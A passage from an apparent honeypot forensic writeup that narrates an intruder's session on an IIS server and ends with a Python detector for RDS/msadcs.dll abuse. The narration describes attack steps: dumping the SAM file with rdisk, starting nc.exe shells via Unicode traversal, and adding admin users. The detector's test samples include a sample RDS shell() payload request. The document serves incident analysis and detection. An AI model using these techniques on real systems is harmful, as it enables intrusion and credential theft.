[snip. I'm giving up documenting his every keystroke, as it is taking too long. This is copied from the answers above, so if you've read that, there is nothing new here.]

At 12:58:09 he tries to run pdump in his shell; this fails with "Failed to open lsass: 5. Exiting."
At 12:59:02 he uses the RDS exploit to try and add the user "testuser" and add it to the administrators group.
At 13:00:36 he uses his shell to try and add the user "hi guy". This fails.
At 13:01:36 he uses his shell to try and run the command "net user himan HarHar666 /ADD".
At 13:05:27 he deletes the following files that he uploaded to the system:

samdump.dll
pdump.exe

He then uses the RDS exploit to run several variations of the command

rdisk -s
rdisk /s

while checking the \winnt\repair directory with his shell for the results. Using the RDS exploit he then runs

type c:\winnt\repair\sam._ >>c:\har.txt

and then, using his shell, checks that the file c:\har.txt is there (it is!).

He checks he can type it using his shell, and then exits.

He then uses the %c0%af exploit to start the shell again on port 6969, using the nc.exe, but does not telnet into it yet. He then uses the %c0%af exploit to start the shell again, on port 6968 this time, using the nc.exe. He then telnets into the shell on port 6968.

He copies c:\har.txt to c:\inetput\wwwroot and tries to GET it using his web browser. He then tries to delete it using his shell, but gets "Access Denied" messages. He then tries to delete it using the RDS exploit, but a dir from his shell shows it is still there.
He then looks to see if drives d: e: f: g: exist, but they do not. He then tries a: b:

He then exits from this shell, but uses his %c0%af exploit to attach it to the 6968 port again.

Within another minute somebody (same person?) then connects from 202.85.60.156 to the 6968 shell. This person has a look around the server before changing to the c:\ directory and running the command

echo best honeypot i've seen till now :) > rfp.txt

The person at 213.116.251.162 then starts requesting files using the %c0%af exploit: first \boot.ini, then \READ.NOW.hax0r.

The person from 202.85.60.156 starts having a real good look round the server, examining the contents of several files. They then run

echo test > test.txt

while in c:\inetpub\wwwroot. Straight after that someone (same person?) from ip address 213.116.251.162 requests the file /text.txt from the web server. They then run

echo this can't be true > test.txt
type test.txt

Then 213.116.251.162 requests the file /test.txt from the web server. We then have a succession of people requesting /test.txt from the web server.

213.46.45.38 requests /test.txt
213.48.120.242 requests /test.txt
194.126.101.110 requests /test.txt
213.93.39.186 requests /test.txt
24.43.44.7 requests /test.txt
198.142.92.196 requests /test.txt

202.85.50.156, using the remote shell, copies default.htm to default.html. 213.116.251.162 then starts using %c0%af to create another ftp script. This time they upload whisker.tar.gz from the honeypot onto their own machine.

204.137.229.4 requests /test.txt from the web server.
213.116.251.162 then uses the %c0%af exploit to delete the ftp script file.
64.219.144.66 requests /test.txt from the web server.
213.64.51.77 requests /test.txt from the web server.
193.253.209.220 requests /test.txt from the web server.
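The 12:27:08 RDS request in Appendix A is the cleanest indicator in this capture: a request aimed at msadcs.dll, the !ADM!ROX!YOUR!WORLD! boundary, and a Jet query carrying a |shell("...")| expression. What follows is an added example for this writeup, not part of the original submission and not code from the exploit it describes: a small request analyser that flags those three things and pulls out the command and the dbq= database path. The sample requests are constructed; a real RDS request carries the query inside ADO/MIME framing, and these keep only the parts the detector keys on. The query, connect string and boundary are the ones quoted in Appendix A; the host name and the AdvancedDataFactory.Query target are assumptions.

```python
"""Flag RDS/MSADC (msadcs.dll) abuse in captured HTTP requests.

Added example for this writeup, not code from the original submission or from
the exploit it describes. SAMPLES is constructed (see the lead-in): only the
parts a detector keys on are kept, and the host name and the
AdvancedDataFactory.Query target are assumptions.
"""
import re

TOOL_BOUNDARY = "!ADM!ROX!YOUR!WORLD!"          # boundary used by RFP's msadc.pl
SHELL_RE = re.compile(r'\|\s*shell\(\s*"(.*?)"\s*\)\s*\|', re.IGNORECASE | re.DOTALL)
DBQ_RE = re.compile(r"dbq=([^;]+)", re.IGNORECASE)
BOUNDARY_RE = re.compile(r"boundary=([^;\s]+)", re.IGNORECASE)


def parse_request(raw: bytes):
    """Split a raw HTTP request into (request line, header dict, body text).
    Latin-1 is used so arbitrary bytes survive the decode unchanged."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.decode("latin-1")


def analyze_rds(raw: bytes) -> dict:
    """Report whether the request is aimed at msadcs.dll, whether it carries the
    known tool boundary, and what command is pushed through the Jet shell() hook."""
    request_line, headers, body = parse_request(raw)
    parts = request_line.split()
    method = parts[0] if parts else ""
    target = parts[1] if len(parts) > 1 else ""
    targets_msadc = "msadcs.dll" in target.lower()
    bm = BOUNDARY_RE.search(headers.get("content-type", ""))
    sm = SHELL_RE.search(body)
    dm = DBQ_RE.search(body)
    if targets_msadc and sm:
        severity = "exec"      # command execution attempt
    elif targets_msadc:
        severity = "probe"     # checking whether the DLL is reachable
    else:
        severity = "none"
    return {
        "method": method,
        "targets_msadc": targets_msadc,
        "known_tool_boundary": bool(bm) and bm.group(1) == TOOL_BOUNDARY,
        "shell_command": sm.group(1) if sm else None,
        "dbq_path": dm.group(1).strip() if dm else None,
        "severity": severity,
    }


# Constructed samples: the 12:26:49 probe, the 12:27:08 command, and a normal GET.
SAMPLES = {
    "probe": b"GET /msadc/msadcs.dll HTTP/1.0\r\nHost: kenny\r\n\r\n",
    "exec": (
        b"POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1\r\n"
        b"Host: kenny\r\n"
        b"Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3\r\n"
        b"\r\n"
        b"--!ADM!ROX!YOUR!WORLD!\r\n"
        b"Select * from Customers where City='|shell(\"cmd /c echo werd >> c:\\fun\")|'\r\n"
        b"driver={Microsoft Access Driver (*.mdb)};"
        b"dbq=c:\\winnt\\help\\iis\\htm\\tutorial\\btcustmr.mdb;\r\n"
        b"--!ADM!ROX!YOUR!WORLD!--\r\n"
    ),
    "benign": b"GET /guest/default.asp HTTP/1.0\r\nHost: kenny\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        r = analyze_rds(raw)
        print(f"{name:6} {r['severity']:5} tool_boundary={r['known_tool_boundary']!s:5} "
              f"cmd={r['shell_command']!r}")
```

The boundary string is the weakest of the three signals, since anyone can change it; the msadcs.dll target plus a shell() expression in the body is the pair worth alerting on, and the extracted command (here "cmd /c echo werd >> c:\fun") is what tells the analyst which file to look for on the host.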